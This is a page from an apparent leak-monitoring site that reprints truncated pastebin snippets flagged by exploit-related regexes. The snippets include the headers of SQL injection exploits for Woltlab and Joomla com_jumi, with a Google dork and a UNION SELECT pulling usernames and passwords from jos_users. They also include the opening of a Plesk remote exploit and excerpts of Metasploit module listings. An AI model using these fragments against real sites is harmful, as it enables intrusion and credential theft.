LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Exploit’

Exploit

2 votedvote

Detected 1 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’:

# Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit
# Google Dork: inurl:regenbogenwiese.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe
# Version: 1.5
# Tested on: Windows 8/Backtrack
#
 
#!/usr/bin/ruby
#secunet.cc
#

Source: http://pastebin.com/raw.php?i=sbGGKpQr

Exploit

0 votedvote

Detected 1 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’:

#plesk remote exploit by kingcope
#all your base belongs to me :>
use strict;
use warnings;
use IO::Socket;
use URI::Escape;
main {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
	PeerPort => 80,
	Proto    => 'tcp') or die "OH GOD HOW DID THIS GET HERE I AM NO

Source: http://pastebin.com/raw.php?i=c05BeyVz

Exploit

0 votedvote

Detected 1 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’:

] My Site : Enjekte.NeT
#[~] Skype   : Hackers_Dj_Taleh
#[!] exploit Name: Joomla com_jumi
########################################
print "tt \n\n";
print "tt GH Injector | Ghana Attacker \n\n";
print "tt \n\n";
print "tt Joomla com_jumi Remote SQL Injection Exploit \n\n";
use LWP::UserAgent;
print " Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$dzmind="concat(username,0x3a,password)";
$sakkure="jos_users";
$com="com_jumi";
$cw="+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Co

Source: http://pastebin.com/raw.php?i=BdXPvWc1

Exploit

0 votedvote

Detected 1 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’:

atus code of response
      + size of response
      + matching string or regex in response data
      + ... see --help

  * Modular design
      + not limited to network modules (eg. the unzip_pass module)
      + not limited to brute-forcing (eg. remote exploit testing, or vulnerable version probing)

  * Interactive runtime
      + show progress during execution (press Enter)
      + pause/unpause execution (press p)
      + increase/decrease verbosity
      + add new actions & conditions during runtime (

Source: http://pastebin.com/raw.php?i=kpWqgmdy

Shellcode

1 votedvote

Detected 2 occurrence(s) of ‘shellcode’:

ulti/login/manyargs                                    2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   firefox/local/exec_shellcode                                   2014-03-10       normal     Firefox Exec Shellcode from Privileged Javascript Shell
   freebsd/ftp/proftp_telnet_iac                                  2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/http/watchguard_cmd_exec                            

Detected 2 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’:

e_popen2                                        2011-10-04       excellent  Plone and Zope XMLTools Remote Command Execution
   multi/http/pmwiki_pagelist                                     2011-11-09       excellent  PmWiki pagelist.php Remote PHP Code Injection Exploit
   multi/http/polarcms_upload_exec                                2012-01-21       excellent  PolarBear CMS PHP File Upload Vulnerability
   multi/http/processmaker_exec                                   2013-10-24       excellent  ProcessMaker Open Sou

Detected 1 occurrence(s) of ‘remote file inclusion’:

 unix/webapp/wp_admin_shell_upload                              2015-02-21       excellent  WordPress Admin Shell Upload
   unix/webapp/wp_advanced_custom_fields_exec                     2012-11-14       excellent  WordPress Plugin Advanced Custom Fields Remote File Inclusion
   unix/webapp/wp_ajax_load_more_file_upload                      2015-10-10       excellent  WordPress Ajax Load More PHP Upload Vulnerability
   unix/webapp/wp_asset_manager_upload_exec                       2012-05-26       excellent  WordPress Asset

Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

tp/gestioip_exec                                       2013-10-04       excellent  GestioIP Remote Command Execution
   multi/http/git_client_command_exec                             2014-12-18       excellent  Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   multi/http/gitlab_shell_exec                                   2013-11-04       excellent  Gitlab-shell Code Execution
   multi/http/gitorious_graph                                     2012-01-19       excellent  Gitorious Arbitrary Command Execution

Source: http://pastebin.com/raw.php?i=g2uwH9pg